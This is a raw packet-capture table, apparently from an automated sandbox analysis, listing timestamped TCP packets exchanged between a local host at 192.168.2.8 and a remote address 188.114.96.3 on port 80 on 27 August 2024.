                                Aug 27, 2024 09:49:37.659568071 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.739809036 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.739839077 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.739850044 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.739936113 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.739947081 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.739958048 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.739969969 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.739983082 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.740215063 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.740319967 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.741302013 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.741323948 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.741336107 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.741431952 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.741445065 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.741456985 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.741498947 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.741509914 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.741616011 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.741626978 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.741638899 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.741652966 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.741657972 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.741686106 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.741708994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.741723061 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.741750002 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.741816998 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.741828918 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.741839886 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.741852045 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.741862059 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.741863012 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.741874933 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.741884947 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.741885900 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.741903067 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.742063999 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.742074966 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.742091894 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.742103100 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.742114067 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.742130041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.742134094 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.742141008 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.742158890 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.742176056 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.742191076 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.743634939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.743659019 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.743681908 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.743763924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.743803978 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.743869066 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.743880987 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.743891001 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.743911028 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.743974924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.743988037 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.744000912 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.744016886 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.744036913 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.744143963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.744155884 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.744165897 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.744179010 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.744182110 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.744191885 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.744201899 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.744205952 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.744266033 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.744278908 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.744329929 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.744342089 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.744376898 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.744388103 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.744400024 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.744462013 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.744494915 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.744505882 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.744523048 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.744950056 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.744961023 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.744971991 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.744991064 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.745003939 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.745012999 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.745024920 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.745035887 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.745090961 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.745111942 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.745124102 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.745137930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.745147943 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.745156050 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.745167971 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.745193958 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.745210886 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.745222092 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.745230913 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.745246887 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.745330095 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.745340109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.745351076 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.745368958 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.745376110 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.745388031 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.745398045 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.745409966 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.745421886 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.745429993 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.745441914 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.745445967 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.745454073 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.745460033 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.745487928 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.745534897 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.745601892 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.745614052 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.745632887 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.745651007 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.745668888 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.745682001 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.745687008 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.745695114 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.745706081 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.745713949 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.745733976 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.745913982 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.745975018 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.745985985 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.746004105 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.746016026 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.746052027 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.746071100 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.746073961 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.746093035 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.746108055 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.746148109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.746160030 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.746179104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.746189117 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.746190071 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.746200085 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.746212959 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.746213913 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.746227980 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.746231079 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.746263981 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.746289968 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.746300936 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.746313095 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.746324062 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.746335030 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.746335983 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.746357918 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.746424913 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.746437073 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.746447086 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.746459007 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.746463060 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.746470928 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.746480942 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.746504068 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.746535063 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.746551991 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.746582985 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.746583939 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.746594906 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.746606112 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.746617079 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.746624947 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.746629000 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.746644974 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.789257050 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.826862097 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.826889992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.826901913 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.826925039 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.826936007 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.826970100 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.826984882 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.826997042 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.827008009 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.827042103 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.827060938 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.828382015 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.828452110 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.828463078 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.828494072 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.828537941 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.828552961 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.828564882 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.828577042 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.828588963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.828599930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.828619003 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.828644991 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.828648090 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.828656912 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.828675985 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.828742981 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.828753948 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.828763962 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.828775883 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.828788042 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.828788996 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.828854084 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.828866959 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.828932047 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.828943014 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.828953028 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.828964949 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.828975916 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.828977108 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.829026937 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.829058886 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.829077005 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.829138994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.829149961 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.829159975 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.829171896 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.829184055 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.829184055 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.829194069 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.829206944 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.829206944 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.829282045 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.830642939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.830652952 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.830660105 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.830722094 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.830738068 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.830739975 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.830749989 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.830774069 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.830775023 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.830786943 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.830805063 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.830810070 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.830846071 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.830878973 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.830889940 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.830902100 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.830923080 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.830960035 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.830971003 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.830981970 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.830992937 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.830996990 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.831017017 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.831233025 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.831276894 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.831305981 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.831317902 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.831347942 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.831350088 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.831358910 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.831402063 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.831413984 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.831428051 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.831450939 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.831976891 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.831988096 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.832000017 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.832022905 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.832051992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.832063913 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.832079887 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.832092047 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.832102060 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.832118034 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.832129002 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.832134008 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.832139015 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.832163095 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.832191944 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.832210064 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.832221985 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.832235098 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.832247972 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.832257032 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.832272053 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.832309961 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.832377911 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.832389116 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.832400084 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.832412958 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.832423925 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.832431078 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.832443953 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.832453012 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.832457066 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.832468987 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.832477093 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.832495928 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.832550049 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.832614899 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.832628012 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.832648039 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.832674980 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.832684994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.832695007 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.832706928 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.832710028 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.832730055 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.832904100 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.832926035 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.832951069 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.833017111 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.833034992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.833045959 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.833050013 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.833059072 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.833081007 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.833178043 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.833189964 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.833201885 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.833213091 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.833218098 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.833230019 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.833240032 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.833241940 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.833254099 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.833255053 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.833297014 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.833338022 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.833348989 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.833359957 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.833372116 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.833379984 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.833383083 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.833396912 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.833398104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.833439112 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.833447933 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.833461046 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.833481073 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.833492041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.833503008 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.833518982 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.833539009 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.833575010 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.833585978 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.833612919 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.833687067 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.833698034 CEST8049715188.114.96.3192.168.2.8
